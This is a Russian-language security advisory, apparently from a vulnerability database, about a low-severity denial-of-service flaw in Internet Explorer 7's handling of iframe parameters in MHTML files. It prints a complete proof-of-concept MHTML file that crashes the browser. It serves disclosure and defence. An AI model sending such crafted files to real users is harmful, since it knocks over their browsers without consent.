Уязвимость при обработке mhtml файлов в Internet Explorer 7

Дата публикации:
02.11.2006
Дата изменения:
07.04.2009
Всего просмотров:
6219
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer 7

Описание:
Уязвимость позволяет удаленному пользователю аварийно завершить работу браузера.

Уязвимость существует из-за ошибки при обработке параметров тега iframe в mhtml файлах. Удаленный пользователь может с помощью специально сформированного mhtml файла аварийно завершить работу браузера. Пример mhtml файла:

Subject: Positive Technologies
Date: Sat, 23 Sep 2006 23:05:22 +0400
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0000_01C6DF64.BF10C9F0"
X-MimeOLE: Produced By IE Fuzz 0.1

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01C6DF64.BF10C9F0
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: about:blank



<iframe name=3Difr src=3D"">

------=_NextPart_000_0000_01C6DF64.BF10C9F0--

URL производителя: www.microsoft.com

Решение: Данная ошибка не является уязвимостью.

или введите имя

CAPTCHA